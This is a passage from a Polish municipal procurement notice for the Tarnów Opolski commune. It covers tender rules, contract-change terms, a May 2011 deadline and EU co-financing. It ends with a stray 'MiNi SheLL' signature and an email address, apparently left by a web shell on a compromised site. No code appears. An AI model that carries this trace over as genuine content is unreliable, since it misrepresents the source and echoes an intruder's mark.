<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W przypadku zaistnienia jakichkolwiek okoliczności bądź zdarzeń powodujących konieczność zmiany umowy,  Zamawiający oraz Wykonawca dopuszczają zmianę warunków  umowy, w szczególności polegających na: 
a) zmianie wysokości wynagrodzenia dla Wykonawcy,
b) zmianie terminu wykonania zamówienia przez Wykonawcę,
c) zmianie terminu zapłaty wynagrodzenia dla Wykonawcy,
d) zmianie okresu rękojmi,
e) zmianie wysokości kosztów wykonania zamówienia.
2. Zmiany umowy wymagają formy pisemnej, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.tarnowopolski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Tarnowie Opolskim ul. Dworcowa 6, 46-050 Tarnów Opolski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2011 godzina 10:00, miejsce: Urząd Gminy w Tarnowie Opolskim ul. Dworcowa 6, 46-050 Tarnów Opolski pok. nr.3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot niniejszego zamówienia jest współfinansowany ze środków Unii Europejskiej ze środków Europejskiergo Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego na lata 2007-2013 poddziałanie RPOP.05.01.02 Wsparcie lokalnej infrastruktury edukacyjnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com